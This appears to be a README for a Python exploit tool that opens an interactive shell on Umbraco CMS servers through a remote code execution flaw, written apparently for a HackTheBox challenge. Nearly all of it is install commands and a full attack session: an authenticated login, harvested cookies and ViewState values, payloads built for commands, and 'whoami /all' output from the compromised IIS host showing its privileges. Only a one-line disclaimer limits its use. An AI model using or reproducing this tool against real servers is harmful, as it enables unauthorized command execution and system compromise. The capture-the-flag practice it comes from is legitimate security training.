This module implements a shell to exploit a RCE in umbraco CMS.
I implements this module for a HackTheBox challenge, it's useful when you can't write or download any file.
This package require:
- python3
- python3 Standard Library
git clone "https://github.com/mauricelambert/shell_exploit_umbraco.git"
cd "shell_exploit_umbraco"
python3 -m pip install .┌──(kali㉿kali)-[~/Documents/HTB]
└─$ python3 exploit_shell_umbraco.py
Host (example: http://10.10.100.101): http://10.129.230.172
Username: [email protected]
Password:
[*] Send login request
[+] New cookies: UMB-XSRF-TOKEN=kPiEjnUoifsXRwPU9Yc9mKvLLjlDe3b9myPZdQvzL2PZJtO_GHTg32RKgaS2CaQuXYE7YXY9UYNH-72pRboM5YzwFlp-yX5A2eWauXu77EtwR3qurlpy4KkUYR_jh_z00; path=/, UMB-XSRF-V=RXVR-FwE-AT3LIOAG_35oInJXGDoUQjMMxFs2rSST9xiTuW7ENR4xe_63l_vu1BfzrqldbEAW8npVePwGd5AWui1RiKYlEV6l5VsbfJXuis1; path=/; httponly, UMB_EXTLOGIN=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT, UMB_UCONTEXT=1E360E52FAF3E920FAC97C7B4325CAFD85C5FC82726866E1B7002B5C533EA2D372B7B649A250C0D7DAD5AECF84F8B5548251A47557C9992E8809C59EAE31C55E59DE7CEC92A2B8F3E750066C4C737F3A47AA45FFDF67972E239460EDD3F555B42E792B931C8DB621868A3DB92FDFEE49F65329D310F34F0E08599095021DBCDEB5AA175ADCAD76403865B5C9A3DA3E678EAE234640B8A8FEB42E221E0FF8F499C73C2E58D182441C12172055FC10C7507EC5B479903441516124267CB87349758E1BC39A7A2342A39A93CB7BA1867361E1DB7A2F86A3BA26E4760C80FFF0F7EB2941C960D6D4B3D423EE5DD33E49F7FC1DB8492AC09383A63CAACAB338CE4ABEFB9B3AF5D9F8B1E4A94B66B962AD65D8292EB07DF3FAE1494D894E5D01E4FB33DDD80047A889304F246ECBC31B72DCD0DC27F0663F69625ACDD6E4E57AD75AC10F0A70F76D76FADA668D6228F6A09DA6B54A4064DF720A0D4B42CC70546CA1F819E378D970AB119C3737F7C4FF58093A14DDB311FC2B933CB9B58614F8B49BD476F16C35921EA3C9350B1D20F5AE5A674A7E96144507C3C881B6859CC9452F10A20E4D11DFABB8A3E61156F972F7A9F321C2B3C2269D82B99E4130C77222646904C5142D92A87F1ED882A5CC377F24A6116A83C189344D5E50A742C83311F1EB2B54C3C558A0552F87EABE2CAC62C08D658F529AACB6C0D29E03426905736ACEE3F9195730823971EEC58E3DCFA1F7E50BBD8F67D79F7AB0588C224F86960E18B357DBBCBE606EB758687FA344563A41E2E58AE0AF27888A87745C57F77B395CA8B093FF2EC82E7873209850FD9C71CBDF1C88537A43E7BEB91E6BFC960779E34DC9C09A55FDAF32113752875F076424A9FDA0BB51A63AF0A860B495B9DD4ADBE44DB9845263A09412A8FDF1779EFEC556D9F5190D20A0B316208CFF4ADB73C9198B2CA89C984D8DF626747CA6A8C7953D9DC680FB52B60F266AF9956DEAA48E0FBF29249E6BD339FA5C3DD97D8A39089DCB4259FB06B01CDBC73D64C33D7D66F95803A37AB4376499EF2D08D6BC04700A4E8566398C97E5475DF726FEBD4578; path=/; expires=Sun, 25-Feb-2024 14:31:13 GMT; HttpOnly
[*] Send GET request for CSRF token
[+] Found 'input' with id '__VIEWSTATE' and value 'aPc9IRB05sutyu3mh8Oe4fzUYEt5jf3WYggoPLD80MfL4TCfQYH+wZ89pXNeamT2jBBZdHeQl9rL0+4as5TtPH5o+VCNz6NsXoWTzKOgtvl8F4KU3g4pz5rg/Gfkn9mO'
[+] Found 'input' with id '__VIEWSTATEGENERATOR' and value '7F6ABE9B'
[*] Build payload for command: echo %cd%
[+] Found 'input' with id '__VIEWSTATE' and value 'ml2NHYvTsuYI/68j9P+cjtKklEPiqMTyfNrbrbU0nSlQIxhxgZeoaE5megfiaxm2BrDqEWOpD7spHd48wmploPqFvdg1RSvKdsGMqrAV0LpdGQx6QzVlUteOz/Umoel+sVpvPMaYo9eDW6MZcSCXcqx4fgPdnJ+zSwdBXNVBqJxqAIv4GrsS9+8p/xx6VIzISzTLc4m7Nga/KVykqUDM2ezu0AEJwptgOHZrcjG5JaAw7YACU50nmPmDwBkpI5s2BJiSkZQilvFXG3VUmqHbE4owKF0dje/mgRMdDgPXwD8NJEZjADVsw2Tpuph/FV/BoPHUcq+nJdXlwl1BzzOtFA=='
[+] Found 'input' with id '__VIEWSTATEGENERATOR' and value '7F6ABE9B'
[+] Found data: c:\windows\system32\inetsrv
Welcome to the Umbraco exploit shell - do not use it for illegal purposes
[email protected]:c:\windows\system32\inetsrv> whoami /all
[*] Build payload for command: whoami.exe /all
[+] Found 'input' with id '__VIEWSTATE' and value '...'
[+] Found 'input' with id '__VIEWSTATEGENERATOR' and value '7F6ABE9B'
[+] Found data:
USER INFORMATION
----------------
User Name SID
========================== =============================================================
iis apppool\defaultapppool S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label S-1-16-12288
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Unknown SID type S-1-5-82-0 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
[email protected]:c:\windows\system32\inetsrv> Bye !
┌──(kali㉿kali)-[~/Documents/HTB]
└─$
Licensed under the GPL, version 3.